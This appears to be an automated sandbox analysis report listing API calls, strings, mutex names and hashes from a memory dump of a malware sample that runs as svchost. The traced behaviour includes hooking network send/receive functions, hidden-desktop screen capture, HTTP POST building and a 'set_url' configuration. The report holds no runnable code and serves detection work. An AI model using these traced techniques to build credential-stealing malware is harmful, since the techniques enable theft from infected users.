                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781D2
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781EF
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C78224
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                    • API String ID: 188880187-3887548279
                                                                                                                                                                                                                    • Opcode ID: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                                    • Instruction ID: e1d2fbe0d8736019194c9f376290799d48bd3895722b7c8204f9a690c898a7f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA415E71E81344AFDB11CFA9D889BDABBF8EF49710F1446A9E509E7280D7705911CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75AF7390), ref: 02C8F0DD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C8F0F4
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8F0FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F10B
                                                                                                                                                                                                                    • ReadFile.KERNEL32 ref: 02C8F12C
                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02C8F142
                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02C8F14E
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75AF7390), ref: 02C8F172
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F185
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F188
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F195
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F198
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$AllocFreePointerReadSizeValidatememset
                                                                                                                                                                                                                    • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                                    • API String ID: 2165369453-4158457813
                                                                                                                                                                                                                    • Opcode ID: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                                    • Instruction ID: 205416860f5337fade4d07def29ba387aed30ced77a7123e8de2b8e9bd581d6e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B331AD71E41355ABE721AF25DC44F6BB7ACEF84B58F008A1DF90487180DB30DA148BB2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7622F550,7622DF10,02C8475B), ref: 02C882F1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02C88303
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C88322
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,send), ref: 02C88330
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02C8834C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02C88368
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 02C88384
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                                    • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                                    • API String ID: 1216545827-2206184491
                                                                                                                                                                                                                    • Opcode ID: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                                    • Instruction ID: 9a52b65efe7a915dc87aac047ecc0af53a9f84a6923bcf0b944caf202d9e69fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3010C76BC032A30F92231751C02F6A824E5FC1ECDF968B31B906F25C4DA95E60648B8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C9036D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bffd6,KBP), ref: 02C90387
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bffd6$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4173420962-1310770680
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C7976E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C79797
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7979E
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C797B2
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C79821
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C7983A
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C798CB
                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 02C798E2
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79929
                                                                                                                                                                                                                    • GetWindowInfo.USER32 ref: 02C799A1
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                                      • Part of subcall function 02C79030: IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                                      • Part of subcall function 02C79030: MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                                      • Part of subcall function 02C79030: SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                                    • String ID: <$P0#v
                                                                                                                                                                                                                    • API String ID: 4123185898-512927467
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C9036D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bffd6,KBP), ref: 02C90387
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bffd6$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4173420962-1310770680
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7DA94
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DAF5
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DBB1
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DCF3
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DDAE
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?), ref: 02C7DDBF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02C7DDF1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                                    • API String ID: 438689982-3158524741
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3865430558-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6F6
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6FD
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,80000023,?,00000018,00000000), ref: 02C7F716
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F754
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F75B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F768
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F76F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 02C7F7A5
                                                                                                                                                                                                                      • Part of subcall function 02C7F210: InternetQueryOptionA.WININET(?,00000009,?,?), ref: 02C7F233
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Query$FreeValidate$HttpInfoInternetOptionmemset$Alloc
                                                                                                                                                                                                                    • String ID: POST$T
                                                                                                                                                                                                                    • API String ID: 4198387326-1208759463
                                                                                                                                                                                                                    • Opcode ID: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                                    • Instruction ID: bda962978ceaa05048a9369c1bf0b2edf011d2575adf7fbfcb0148bc20942b15
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A41E471A40345ABD7328FA4DCC8FA777B8AF88715F008A4DE64687980D7B0E644DBA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,76233050,762330D0,76233080), ref: 02C78280
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78294
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7829F
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C782C7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C782E4
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C782F5
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C78315
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C7832C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C7836C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783B4
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783BD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2125184990-3387790918
                                                                                                                                                                                                                    • Opcode ID: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                                    • Instruction ID: 3d477f1b7a102f56b4d127cad5f1c2a6d0e46db0bc53025ec961f26a942f3015
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d0d9e5a832b1a5d5dcd235c828ed90d58ccb9c141292ec40fc273a3ff7295ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1441A171E80344ABD7119B74EC59F6A77A9EB88711F208F49FA11972C0CB74A920DFA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F32B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F32E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F33B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F33E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F357
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,02C7F84A,00000000,?), ref: 02C7F368
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F378
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F37B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F388
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F38B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,02C7F84A,00000000,?), ref: 02C7F39B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F39E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7F84A,00000000,?), ref: 02C7F3AB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7F84A,00000000,?), ref: 02C7F3AE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2935687291-0
                                                                                                                                                                                                                    • Opcode ID: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                                    • Instruction ID: c67f42e586b1c9d74857217d00ebd9190e317d3f43df894b3a5983a969eb7d9b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4623eed16cd5b81bbe464dcc97bed0d395a8c6cc79f28935bf282846adab503
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5431F031E853606BDB25AF61E8C8B5B7BACFF88B25F04856AED09D7240C735C500CAE1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C80825
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7622F550,76231620,80000002,?,?,02C84818), ref: 02C80872
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C84818), ref: 02C80875
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84818), ref: 02C80882
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C84818), ref: 02C80885
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8089B
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C808B9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808E7
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808EA
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808F7
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808FA
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805A3
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805BB
                                                                                                                                                                                                                      • Part of subcall function 02C80570: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7622F550,76231620), ref: 02C805DC
                                                                                                                                                                                                                      • Part of subcall function 02C80570: RegQueryValueExA.ADVAPI32(80000002,80F50209a,00000000,00000001,?,00000104,?,?,?,?,7622F550,76231620), ref: 02C80603
                                                                                                                                                                                                                      • Part of subcall function 02C80570: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7622F550,76231620), ref: 02C8068D
                                                                                                                                                                                                                      • Part of subcall function 02C80570: HeapAlloc.KERNEL32(00000000,?,?,?,?,7622F550,76231620), ref: 02C80694
                                                                                                                                                                                                                      • Part of subcall function 02C80570: memset.MSVCRT ref: 02C806A3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$memset$FreeValidatestrstr$AdminAllocOpenQueryUserValue
                                                                                                                                                                                                                    • String ID: set_url
                                                                                                                                                                                                                    • API String ID: 3462927349-1295111526
                                                                                                                                                                                                                    • Opcode ID: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                                    • Instruction ID: d2685373e9730747ddc9d2bdb1d73698abc7836ff454eabe2fa69123fa625bc9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6212632E8637567E63236615C09F5B6A889FC0B59F098664ED08BB240EB61DE48C6F1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A4C
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C92A62
